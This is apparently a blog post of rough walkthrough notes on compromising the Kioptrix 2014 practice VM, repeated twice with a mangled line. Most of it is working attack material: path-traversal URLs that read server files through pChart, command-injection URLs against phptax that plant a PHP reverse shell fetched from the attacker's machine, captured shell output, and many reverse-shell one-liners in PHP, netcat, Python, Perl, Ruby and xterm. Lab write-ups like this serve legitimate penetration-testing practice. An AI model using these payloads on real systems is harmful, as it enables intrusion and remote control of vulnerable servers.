Kioptrixx 2014 Notes - Full walkthrough to be updated
Notes:
httpd.conf file
http://192.168.0.15/pChart2.1.3/examples/index.php?Action=View&Script=%2f..%2f..%2fusr/local/etc/apache22/httpd.conf
httpd Error Log
http://192.168.0.15/pChart2.1.3/examples/index.php?Action=View&Script=%2f..%2f..%2f/var/log/httpd-error.log
Executing system commands
File creation tests
Create a file that shows the phpinfo of the system in the virtual directory /files/
This directory is writable by the webuser www
http://192.168.0.15:8080/phptax/index.php?pfilez=1040d1-pg2.tob;echo%20%22%3C?php%20phpinfo()%20?%3E%22%20%3E%20./files/zzz.php;&pdf=make
This is now listable from the URL
http://192.168.0.15:8080/phptax/files/
We can prove we can write HTML too by create a very simple test and executing the files to see the outcome:
http://192.168.0.15:8080/phptax/index.php?pfilez=1040d1-pg2.tob;echo%20%22%3Ch1%3Etest123%3C/h1%3E%22%20%3E%20test123.html;&pdf=make
Trying to create a backdoor.
Working method..
First we edit the Pentest Monkys php-reverse-shell with the attackers IP and the port 443 - this could be changed if need to a different port depending on needs and firewall.
Next we create a file called get.txt and within that file we add a line of code we want the file to execute once open.
The command within get.txt will download our reverse shell file later.
http://192.168.0.15:8080/phptax/index.php?pfilez=1040d1-pg2.tob;printf%20%22GET%20http://192.168.0.100/r.txt%20HTTP/1.0\r\n\r\n%22%20%3E%20get.txt;&pdf=make
Now we copy the r.txt file to our apache webservice. (when doing this origianlly with pythons simple https server it didnt work for some unknown reason)
make sure the file is in the root directory like so "/var/www/html/r.txt"
now we use nc to open the r.txt file from the attackers machine, then execute the file to download the reverse shell and rename the file to r.php
http://192.168.0.15:8080/phptax/index.php?pfilez=1040pg1.tob;%20nc%20192.168.0.100%2080%20%3C%20get.txt%20%3E%20r.php;%20&pdf=make
Next we setup out nc listener
nc -l -v -p 4444
Now we execute the php file
http://192.168.0.15:8080/phptax/r.php
And Voila a shell :-)
listening on [any] 4444 ...
192.168.0.15: inverse host lookup failed: Unknown host
connect to [192.168.0.100] from (UNKNOWN) [192.168.0.15] 60832
FreeBSD kioptrix2014 9.0-RELEASE FreeBSD 9.0-RELEASE #0: Tue Jan 3 07:46:30 UTC 2012 root@farrell.cse.buffalo.edu:/usr/obj/usr/src/sys/GENERIC amd64
10:47PM up 6:15, 0 users, load averages: 0.00, 0.00, 0.00
USER TTY FROM LOGIN@ IDLE WHAT
uid=80(www) gid=80(www) groups=80(www)
sh: can't access tty; job control turned off
$
Things that didnt work..
Using PHP
http://192.168.0.15:8080/phptax/index.php?pfilez=1040d1-pg2.tob;php%20-r%20%27$sock=fsockopen(%22192.168.0.100%22,443);exec(%22/bin/sh%20-i%20%3C&6%20%3E&6%202%3E&6%22);%27;&pdf=make
Using NC - Here we get a connection that immediately disconnects straight away
http://192.168.0.15:8080/phptax/index.php?pfilez=1040d1-pg2.tob;/bin/sh%20|%20nc%20192.168.0.100%20443;&pdf=make
Output:
#:~ sudo nc -l -p 443 -vvv listening on [any] 443 ...
192.168.0.15: inverse host lookup failed: Unknown host
connect to [192.168.0.100] from (UNKNOWN) [192.168.0.15] 62073
sent 1, rcvd 0
tried on ports 4444, 2345,5050 to no avail..
Maybe the firewall is blocking our connection..
Using NC another way
http://192.168.0.15:8080/phptax/index.php?pfilez=1040d1-pg2.tob;/bin/sh%20|%20nc%20-l%201234;&pdf=make
Using Python
http://192.168.0.15:8080/phptax/index.php?pfilez=1040d1-pg2.tob;/usr/local/bin/python%20-c%20%27import%20socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((%22192.168.0.100%22,4444));os.dup2(s.fileno(),0);%20os.dup2(s.fileno(),1);%20os.dup2(s.fileno(),2);p=subprocess.call([%22/bin/sh%22,%22-i%22]);%27;&pdf=make
http://192.168.0.15:8080/phptax/index.php?pfilez=1040d1-pg2.tob;/usr/local/bin/python2.7%20-c%20%27import%20socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((%22192.168.0.100%22,4444));os.dup2(s.fileno(),0);%20os.dup2(s.fileno(),1);%20os.dup2(s.fileno(),2);p=subprocess.call([%22/bin/sh%22,%22-i%22]);%27;&pdf=make
http://192.168.0.15:8080/phptax/index.php?pfilez=1040d1-pg2.tob;/usr/local/include/python2.7%20-c%20%27import%20socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((%22192.168.0.100%22,4444));os.dup2(s.fileno(),0);%20os.dup2(s.fileno(),1);%20os.dup2(s.fileno(),2);p=subprocess.call([%22/bin/sh%22,%22-i%22]);%27;&pdf=make
Lets check where Python is located and send the output to a files under the listable directory under '/files/' ....
Using 'locate' like so...
http://192.168.0.15:8080/phptax/index.php?pfilez=1040pg1.tob;locate%20python%20%3E%20./files/out.txt&pdf=make
Now we open the file by:
##Output ##
/usr/local/bin/python
/usr/local/bin/python2.7
Using Perl
http://192.168.0.15:8080/phptax/index.php?pfilez=1040d1-pg2.tob;/usr/bin/perl%20-e%20%27use%20Socket;$i=%22192.168.0.100%22;$p=4444;socket(S,PF_INET,SOCK_STREAM,getprotobyname(%22tcp%22));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,%22%3E&S%22);open(STDOUT,%22%3E&S%22);open(STDERR,%22%3E&S%22);exec(%22/bin/sh%20-i%22);};%27;&pdf=make
Using Ruby
http://192.168.0.15:8080/phptax/index.php?pfilez=1040d1-pg2.tob;/usr/bin/ruby%20-rsocket%20-e%27f=TCPSocket.open(%22192.168.0.100%22,4444).to_i;exec%20sprintf(%22/bin/sh%20-i%20%3C&%d%20%3E&%d%202%3E&%d%22,f,f,f)%27;&pdf=make
Xterm
http://192.168.0.15:8080/phptax/index.php?pfilez=1040d1-pg2.tob;xterm%20-display%20192.168.0.100:4444;&pdf=make
Notes:
httpd.conf file
http://192.168.0.15/pChart2.1.3/examples/index.php?Action=View&Script=%2f..%2f..%2fusr/local/etc/apache22/httpd.conf
httpd Error Log
http://192.168.0.15/pChart2.1.3/examples/index.php?Action=View&Script=%2f..%2f..%2f/var/log/httpd-error.log
Executing system commands
http://192.168.0.100:8080/phptax/index.php?pfilez=1040pg1.tob;id > out.txt&pdf=makeFile creation tests
Create a file that shows the phpinfo of the system in the virtual directory /files/
This directory is writable by the webuser www
http://192.168.0.15:8080/phptax/index.php?pfilez=1040d1-pg2.tob;echo%20%22%3C?php%20phpinfo()%20?%3E%22%20%3E%20./files/zzz.php;&pdf=make
This is now listable from the URL
http://192.168.0.15:8080/phptax/files/
We can prove we can write HTML too by create a very simple test and executing the files to see the outcome:
http://192.168.0.15:8080/phptax/index.php?pfilez=1040d1-pg2.tob;echo%20%22%3Ch1%3Etest123%3C/h1%3E%22%20%3E%20test123.html;&pdf=make
Trying to create a backdoor.
Working method..
First we edit the Pentest Monkys php-reverse-shell with the attackers IP and the port 443 - this could be changed if need to a different port depending on needs and firewall.
Next we create a file called get.txt and within that file we add a line of code we want the file to execute once open.
The command within get.txt will download our reverse shell file later.
http://192.168.0.15:8080/phptax/index.php?pfilez=1040d1-pg2.tob;printf%20%22GET%20http://192.168.0.100/r.txt%20HTTP/1.0\r\n\r\n%22%20%3E%20get.txt;&pdf=make
Now we copy the r.txt file to our apache webservice. (when doing this origianlly with pythons simple https server it didnt work for some unknown reason)
make sure the file is in the root directory like so "/var/www/html/r.txt"
now we use nc to open the r.txt file from the attackers machine, then execute the file to download the reverse shell and rename the file to r.php
http://192.168.0.15:8080/phptax/index.php?pfilez=1040pg1.tob;%20nc%20192.168.0.100%2080%20%3C%20get.txt%20%3E%20r.php;%20&pdf=make
Next we setup out nc listener
nc -l -v -p 4444
Now we execute the php file
http://192.168.0.15:8080/phptax/r.php
And Voila a shell :-)
listening on [any] 4444 ...
192.168.0.15: inverse host lookup failed: Unknown host
connect to [192.168.0.100] from (UNKNOWN) [192.168.0.15] 60832
FreeBSD kioptrix2014 9.0-RELEASE FreeBSD 9.0-RELEASE #0: Tue Jan 3 07:46:30 UTC 2012 root@farrell.cse.buffalo.edu:/usr/obj/usr/src/sys/GENERIC amd64
10:47PM up 6:15, 0 users, load averages: 0.00, 0.00, 0.00
USER TTY FROM LOGIN@ IDLE WHAT
uid=80(www) gid=80(www) groups=80(www)
sh: can't access tty; job control turned off
$
Things that didnt work..
Using PHP
http://192.168.0.15:8080/phptax/index.php?pfilez=1040d1-pg2.tob;php%20-r%20%27$sock=fsockopen(%22192.168.0.100%22,443);exec(%22/bin/sh%20-i%20%3C&6%20%3E&6%202%3E&6%22);%27;&pdf=make
Using NC - Here we get a connection that immediately disconnects straight away
http://192.168.0.15:8080/phptax/index.php?pfilez=1040d1-pg2.tob;/bin/sh%20|%20nc%20192.168.0.100%20443;&pdf=make
Output:
#:~ sudo nc -l -p 443 -vvv listening on [any] 443 ...
192.168.0.15: inverse host lookup failed: Unknown host
connect to [192.168.0.100] from (UNKNOWN) [192.168.0.15] 62073
sent 1, rcvd 0
Maybe the firewall is blocking our connection..
Using NC another way
http://192.168.0.15:8080/phptax/index.php?pfilez=1040d1-pg2.tob;/bin/sh%20|%20nc%20-l%201234;&pdf=make
Using Python
http://192.168.0.15:8080/phptax/index.php?pfilez=1040d1-pg2.tob;/usr/local/bin/python%20-c%20%27import%20socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((%22192.168.0.100%22,4444));os.dup2(s.fileno(),0);%20os.dup2(s.fileno(),1);%20os.dup2(s.fileno(),2);p=subprocess.call([%22/bin/sh%22,%22-i%22]);%27;&pdf=make
http://192.168.0.15:8080/phptax/index.php?pfilez=1040d1-pg2.tob;/usr/local/bin/python2.7%20-c%20%27import%20socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((%22192.168.0.100%22,4444));os.dup2(s.fileno(),0);%20os.dup2(s.fileno(),1);%20os.dup2(s.fileno(),2);p=subprocess.call([%22/bin/sh%22,%22-i%22]);%27;&pdf=make
http://192.168.0.15:8080/phptax/index.php?pfilez=1040d1-pg2.tob;/usr/local/include/python2.7%20-c%20%27import%20socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((%22192.168.0.100%22,4444));os.dup2(s.fileno(),0);%20os.dup2(s.fileno(),1);%20os.dup2(s.fileno(),2);p=subprocess.call([%22/bin/sh%22,%22-i%22]);%27;&pdf=make
Lets check where Python is located and send the output to a files under the listable directory under '/files/' ....
Using 'locate' like so...
http://192.168.0.15:8080/phptax/index.php?pfilez=1040pg1.tob;locate%20python%20%3E%20./files/out.txt&pdf=make
Now we open the file by:
##Output ##
/usr/local/bin/python
/usr/local/bin/python2.7
Using Perl
http://192.168.0.15:8080/phptax/index.php?pfilez=1040d1-pg2.tob;/usr/bin/perl%20-e%20%27use%20Socket;$i=%22192.168.0.100%22;$p=4444;socket(S,PF_INET,SOCK_STREAM,getprotobyname(%22tcp%22));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,%22%3E&S%22);open(STDOUT,%22%3E&S%22);open(STDERR,%22%3E&S%22);exec(%22/bin/sh%20-i%22);};%27;&pdf=make
Using Ruby
http://192.168.0.15:8080/phptax/index.php?pfilez=1040d1-pg2.tob;/usr/bin/ruby%20-rsocket%20-e%27f=TCPSocket.open(%22192.168.0.100%22,4444).to_i;exec%20sprintf(%22/bin/sh%20-i%20%3C&%d%20%3E&%d%202%3E&%d%22,f,f,f)%27;&pdf=make
Xterm
http://192.168.0.15:8080/phptax/index.php?pfilez=1040d1-pg2.tob;xterm%20-display%20192.168.0.100:4444;&pdf=make
No comments:
Post a Comment